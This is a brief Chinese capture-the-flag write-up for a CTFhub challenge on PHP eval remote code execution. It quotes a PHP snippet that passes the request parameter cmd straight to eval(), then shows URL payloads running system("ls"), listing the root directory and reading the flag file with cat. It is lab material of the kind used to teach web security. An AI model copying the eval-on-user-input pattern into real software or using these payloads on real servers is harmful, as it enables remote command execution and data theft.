CTFhub-RCE-evel执行

携柺星年2023-11-13 11:42

访问目标地址:

<?php

if (isset($_REQUEST['cmd'])) {

eval($_REQUEST["cmd"]);

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
廋到被风吹走6 分钟前
【Java】【Jdk】Jdk17->Jdk21
java·开发语言
醉逍遥neo38 分钟前
react项目热更新问题
前端·react·热更新·umi·umi max
专注前端30年41 分钟前
Vue3 watchEffect详解:核心用法与原理剖析
前端·javascript·vue.js
hwt107035989842 分钟前
Vue项目,解决Node依赖错误问题
前端·javascript·vue.js
叁散1 小时前
实验一:船舶位置感知与MMSI数据分析
java
LYFlied1 小时前
前端性能优化工程化落地指南:从基础实践到极致性能突破
前端·性能优化·工程化
阿珊和她的猫1 小时前
Webpack常用配置项详解
前端·webpack·node.js
codelang1 小时前
用另一种方式让《留白》继续存在下去
前端
研☆香1 小时前
什么是对象 什么是数组 区别是什么??
java·前端·javascript
利刃大大1 小时前
【SpringBoot】搭建Java部署环境 && 部署项目到Linux服务器
java·服务器·spring boot
热门推荐
01GitHub 镜像站点02jdk21下载、安装(Windows、Linux、macOS)03Linux下V2Ray安装配置指南04手把手教你通过Gemini3 pro 学生认证,白用一年,手慢无!052025 最新教程:注册并切换到美区 Apple ID06安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)07Claude Code Skills 实用使用手册08KGG转MP3工具|非KGM文件|解密音频09【踩坑笔记】50系显卡适配的 PyTorch 安装10UV安装并设置国内源